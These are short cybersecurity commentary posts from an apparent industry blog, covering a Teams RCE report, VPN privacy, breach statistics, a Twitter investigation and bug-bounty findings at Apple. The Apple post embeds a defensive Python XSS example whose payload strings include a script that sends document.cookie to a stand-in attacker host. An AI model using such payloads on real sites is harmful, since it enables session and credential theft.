Interesting Post on Microsoft Github: Teams Vulnerability
December 9, 2020
I found this interesting post on GitHub, one of Microsoft’s open source plays: “Important, Spoofing” – Zero-Click, Wormable, Cross-Platform Remote Code Execution in Microsoft Teams. The post explains how to compromise a Teams environment by sending a new Teams message or editing an existing one. The message looks just peachy to the recipient or recipients. Teams is plural. When the recipient looks at the message, the malicious payload executes. The post points out:
That’s it. There is no further interaction from the victim. Now your company’s internal network, personal documents, 365 documents/mail/notes, secret chats are fully compromised. Think about it. One message, one channel, no interaction. Everyone gets exploited.
Microsoft calls the exploit spoofing. Keep in mind that Microsoft has more than 100 million active users of its Zoom killer.
Stephen E Arnold, December 9, 2020
DarkCyber for December 1, 2020, Now Available
December 1, 2020
DarkCyber reports about Maltrail, an open source cyber tool for detecting malicious traffic. Crime as a Service matures. Now anyone can point-and-click through a ransomware attack. Bad actors helpfully make cyber crime less of a hassle. Insider threats — what DarkCyber calls “the Snowden play” — are becoming more prevalent. Why? A need for money, revenge, or a dose of that old Silicon Valley attitude.
The feature in this episode is a summary of the next-generation in entity recognition from videos and still images. Face recognition is not the most reliable technology in the world; however, researchers from China and Japan have figured out how to match a person’s gait to an individual. Ergo gait recognition. A link to the technical details appears in the program.
The program features a brief extract from a conversation between Robert David Steele, a former CIA professional, and Stephen E Arnold (owner of Dark Cyber). Arnold describes some of the less appreciated reasons why digital information creates new challenges for law enforcement and intelligence professionals. Good news? Not really.
The final story in the program addresses the urgent need for counter unmanned aerial systems by local, county, and state law enforcement agencies. Individuals are ramming drones into police helicopters. The DarkCyber discussion of this problem includes a link to a series of recommendations promulgated by the British government to address this kinetic use of drones.
DarkCyber is produced by Beyond Search. The video program appears every two weeks. The third season of DarkCyber begins in January 2021. The program is non-commercial, does not accept advertising, and does not beg for dollars. How is this possible? DarkCyber is not sure.
You can view the program at this link.
Kenny Toth, December 1, 2020
Virtual Private Networks: Are These Private?
November 30, 2020
About a month ago, Google rolled out its own virtual private network. The timing was mostly in sync with Facebook’s expansion of encrypted services for its chat apps. Is encryption good for users, good for large technology companies, and good for law enforcement?
The story “Google One VPN: Everything You Need To Know” is representative of the coverage of Google’s VPN. I noted:
Google isn’t new to the world of VPNs. It actually has used one for its customers on Google Fi for many years now. Essentially with Google Fi, whenever you connected to a public WiFi network, you would automatically be connected through Google Fi’s VPN. As mentioned before, this is because Public WiFi networks are not secure. So while keeping you from using a lot of data, since Fi charges per gigabyte, it also kept you protected. Now, Google is just moving its VPN to where everyone can use it. Whether they are a Fi customer or not.
The write up does not answer the question about the “goodness” of the Google service. The write up asserts:
Google has said numerous times that it will not use the VPN connection to track, log or sell your browsing activity. But then again, how will we know that Google is not doing that? We won’t. And that goes for any other company too. It’s up to you, whether you trust Google not to collect this data when you’re using its VPN. But don’t forget, that if Google really wanted that data, it could easily get it from your Android smartphone too.
As I said in response to questions posed to me by a former CIA professional (view full 20 minute video here):
Online services are inherently surveillance mechanisms.
Many will not agree with this Arnold Law. That’s okay, but VPNs are particularly interesting because the user agrees to participate in an allegedly secure and private man-in-the-middle service. How secure is a man-in-the-middle service?
Another good question just like “Are VPNs private?”
Stephen E Arnold, November 30, 2020
Amazon and the Cyber Security Industrial Complex
November 24, 2020
This is probably no big deal. Cyber security, threat intelligence, and wonky proprietary tools from startups populated by retired or RIFed intel officers are a big business. I was asked by a “real news” reporter, “How big?” I dutifully sent links to companies selling market forecasts for global cyber security revenues. How big were these numbers? Acquisition big. The hypothesis I have formulated is that when wild and crazy market size projections fly like hungry sparrows, there is a revenue problem. Specifically there are too many sparrows chasing available bugs and bread crumbs. That’s why Blackberry is in the cyber security business. Why LookingGlass stepped away from Cyveillance. That’s why Dark Web indexes of bad actors’ Crime as a Service offerings are a dime a dozen.
It is, therefore, no surprise that the write up “Trend Micro integrates with AWS Network Firewall” explains that Amazon is continuing to add to its pool of 65,000 plus partners. Many of these outfits like Palantir Technologies are in the cyber intelligence and cyber threat business. Bad actors beware.
The write up reports:
Trend Micro’s built-in IPS intelligence will inspect traffic for malicious intent so that the firewall can stop threats before they get a foothold in a virtual private cloud. Together, AWS and Trend Micro offer a simple, scalable service with reliable protection that does not require any infrastructure management.
What’s the hook? Here’s the statement I circled with an Amazon happy face:
Trend Micro’s threat intelligence will be available free with easy deployment for AWS Network Firewall customers.
What do I make of free cyber security services? Not much, but I hear the Bezos bulldozer pulling into the cyber intelligence and security services shopping mall. Roll up or roll over time for the cheerful orange machine with a big smile painted on the cab.
Stephen E Arnold, November 24, 2020
Work from Home: Manage This, Please
November 19, 2020
I read “Over Half of Remote Workers Admit to Using Rogue Tools Their IT teams Don’t Know About.” If the information in the write up is on the money, cyber security for the WFH crowd may be next to impossible. The write up reports:
According to a new report from mobile security firm NetMotion, the vast majority of remote workers (62 percent) are guilty of using Shadow IT, with some of them (25 percent) using a “significant number” of unapproved tools.
The article includes this statement:
“Sadly, our research showed that nearly a quarter of remote workers would rather suffer in silence than engage tech teams,” said Christopher Kenessey, CEO of NetMotion.
Net net: Bad actors relish the WFH revolution. WFHers using software not vetted by their employer create numerous opportunities for mischief. How does a firm addicted to Slack and Microsoft Teams deal with this situation:
Hey, team. I am using this nifty new app. It can speed up our production of content. You can download this software from a link I got on social media. Give it a whirl.
Manage this, please.
Stephen E Arnold, November 19, 2020
Security Is a Game
November 12, 2020
This article’s headline caught my attention: “Stop Thinking of Cybersecurity As a Problem: Think of It As a Game.” I think I understand. The write up asserts:
The thing is, cybersecurity isn’t a battle that’s ultimately won, but an ongoing game to play every day against attackers who want to take your systems down. We won’t find a one-size-fits-all solution for the vulnerabilities that were exposed by the pandemic. Instead, each company needs to charge the field and fend off their opponent based on the rules of play. Today, those rules are that anything connected to the internet is fair game for cybercriminals, and it’s on organizations to protect these digital assets.
Interesting idea. Numerous cyber security solutions are available. Some organizations have multiple solutions in place. Nevertheless, bad actors continue to have success. If the information in Risk Based Security’s 2020 Q3 Data Breach QuickView Report is anywhere close to accurate, the “game” is being won by bad actors: lots of data was sucked down by cyber criminals in the last nine months.
Fun, right?
Stephen E Arnold, November 12, 2020
Organizational Security: Many Vendors, Many Breaches
October 30, 2020
I noted a write up with a fraught title: “Breaches Down 51%, Exposed Records Set New Record with 36 Billion So Far.” I interpreted this to mean “fewer security breaches but more data compromised.”
The write up explains the idea this way:
The number of records exposed has increased to a staggering 36 billion. There were 2,935 publicly reported breaches in the first three quarters of 2020, with the three months of Q3 adding an additional 8.3 billion records to what was already the “worst year on record,” Risk Based Security reveals.
Okay. How is this possible? The answer:
The report explores numerous factors such as how media coverage may be a factor contributing to the decline in publicly reported breaches. In addition, the increase of ransomware attacks may also have a part to play.
I interpreted this to mean, “Let’s not tell anyone.”
If you want a copy of this Risk Based Security report, navigate to this link. You will have to cough up an email and a name.
Net net: More data compromised and fewer organizations willing to talk about their security lapses. What about vendors of smart cyber security systems? Vendors are willing to talk about the value and performance of their products.
Talk, however, may be less difficult than dealing with security breaches.
Stephen E Arnold, October 30, 2020
Cyber Sins: Part of the Human Condition Permanently
October 24, 2020
Business operations have secrets and maybe sins. Medium explains “The Seven Deadly Sins Of Cybersecurity.” Borrowing the metaphor of the biblical seven deadly sins (greed, gluttony, lust, envy, sloth, wrath, and pride), the article describes the digital manifestation of each. The write up argues that cybersecurity is bedeviled by seven deadly sins of its own.
What’s a sin?
Covid-19 has made cyber security more important than ever as people are forced to work from their homes. Organizations need cybersecurity to protect their information and the pandemic exposes all weaknesses in organizations’ cybersecurity culture, if any exists. Another sin is believing a layered, complex solution equals a decent security plan. Complexity actually creates more problems, especially when plans involve too much overhead management and talking about “doing something” instead of taking action.
Credential abuse is also a deadly sin. One commits credential abuse by over-relying on simple passwords. People love simple passwords because they are easy to remember, and they hate complex credential systems because they are annoying. It might be better to find an alternative solution:
“So what solutions should you start exploring? Identity & Access Management, Privileged Access Management (PAM), Just-In-Time/Just-Enough Administration, Role-based access controls, Multi-Factor Authentication, and more. What about Single Sign-On? Federated Identity management? everyone must adhere to secure credential management without exception…In climbing, free-soloing might be the epitome of cool, but when you fall, you’ll wish you had a belay.”
The article advises to be aware that you cannot treat all of your information the same way. The example the article uses is treating a mobile number differently than a credit card number. It is important to be aware of how any information posted online could be potentially harmful.
Then an ultimate sin is not paying attention to blind spots:
“Many threats “hide in plain sight” and we don’t have the time, energy, and resources to look for them, let alone know where to start. This problem is due to complexity, a lack of resources, and too many gaps and overlaps.”
The key to absolving this sin is discovering the blind spots, then developing solutions.
Sin, however, is part of the human condition. Bad actors sense opportunities and exploit them. Cyber crime continues to thrive and become more pervasive.
Whitney Grace, October 24, 2020
Twitter for Verification: The Crypto Approach
October 21, 2020
New York State’s Twitter Investigation Report explores the cybersecurity “incident” at Twitter and its implications for election security. If you don’t have a copy, you can view the document at this url. The main point of the document struck me as this statement from the document:
Given that Twitter is a publicly traded, $37 billion technology company, it was surprising how easily the Hackers were able to penetrate Twitter’s network and gain access to internal tools allowing them to take over any Twitter user’s account.
With the Department of Financial Services’ report in mind, I found the information in “.Crypto Domain Owners Can Now Be Verified With Twitter Accounts for Safer Payments” interesting. Twitter and “safer” are not words I would associate. The write up reports:
Blockchain startup Unstoppable Domains and oracle network Chainlink have launched a new feature allowing individuals or entities with blockchain domains to authenticate themselves using their Twitter accounts. The feature is powered by Chainlink oracles, which connect each .crypto address from Unstoppable Domains to a public Twitter username. The firms said the Twitter authentication could help stem crimes in cryptocurrency payments such as phishing hacks.
In one of our Twitter tests, we created an account in the name of a now deceased pet. Tweets were happily disseminated automatically by the dog. Who knew that the dead dog’s Twitter account could reduce phishing attacks?
Twitter: Secure enough to deliver authentication? The company’s approach to business does not give me confidence in the firm’s systems and methods.
Stephen E Arnold, October 21, 2020
Apple and AWS: Security?
October 13, 2020
DarkCyber noted an essay-style report called “We Hacked Apple for 3 Months: Here’s What We Found.” The write up contains some interesting information. One particular item caught our attention:
AWS Secret Keys via PhantomJS iTune Banners and Book Title XSS
The researchers located potential vulnerabilities that would allow such alleged actions as:
- Obtain what are essentially keys to various internal and external employee applications
- Disclose various secrets (database credentials, OAuth secrets, private keys) from the various design.apple.com applications
- Likely compromise the various internal applications via the publicly exposed GSF portal
- Execute arbitrary Vertica SQL queries and extract database information
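The item that caught our attention pairs a cross-site scripting bug in a user-supplied book title with banners rendered by PhantomJS, a headless browser. As an added example, not code from the bug-bounty write up or from Apple, the Python below models that rendering step: a banner template that interpolates the title raw, the same template with HTML escaping, and a small parser-based audit that reports whether a script element or event-handler attribute survives into the rendered markup. The template, the two constructed titles and the function names are illustrations, not anything from the report.

```python
from html import escape
from html.parser import HTMLParser

# Constructed attacker-controlled titles. The rendering service is assumed to load the
# resulting HTML in a headless browser, which is where a surviving payload would execute.
SCRIPT_TITLE = "Cooking 101<script>location='http://attacker.example/?c='+document.cookie</script>"
ATTRIBUTE_TITLE = 'Cooking 101" onmouseover="alert(1)'

# Hypothetical banner template: the title lands in an attribute and in text content.
BANNER = '<div class="banner"><img alt="{alt}"><h1>{title}</h1></div>'


def render_banner_unsafe(title: str) -> str:
    """Vulnerable: the title is interpolated verbatim into both contexts."""
    return BANNER.format(alt=title, title=title)


def render_banner_safe(title: str) -> str:
    """Hardened: escape &, <, > and, with quote=True, the quote characters that
    would otherwise let a title break out of the alt attribute."""
    safe = escape(title, quote=True)
    return BANNER.format(alt=safe, title=safe)


class _MarkupAuditor(HTMLParser):
    """Collects findings that indicate live script in rendered markup: a <script>
    element or any on* event-handler attribute on any element."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")


def audit_markup(rendered: str) -> list[str]:
    """Parse the rendered banner the way a browser would and return the findings.
    Parsing, rather than searching the raw string, is what distinguishes an escaped
    '&quot; onmouseover=' inside an attribute value from a real attribute."""
    auditor = _MarkupAuditor()
    auditor.feed(rendered)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for title in (SCRIPT_TITLE, ATTRIBUTE_TITLE):
        print("unsafe:", audit_markup(render_banner_unsafe(title)))
        print("safe:  ", audit_markup(render_banner_safe(title)))
```

The practical point is that escaping has to match every context the value is rendered in; a title that is harmless in text content can still break out of an attribute, and a banner generator that feeds the result to a headless browser runs whatever survives with that browser's privileges.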
Other issues are touched upon in the write up.
Net net: The emperor has some clothes; they are just filled with holes and poorly done stitching if the write up is correct.
Stephen E Arnold, October 13, 2020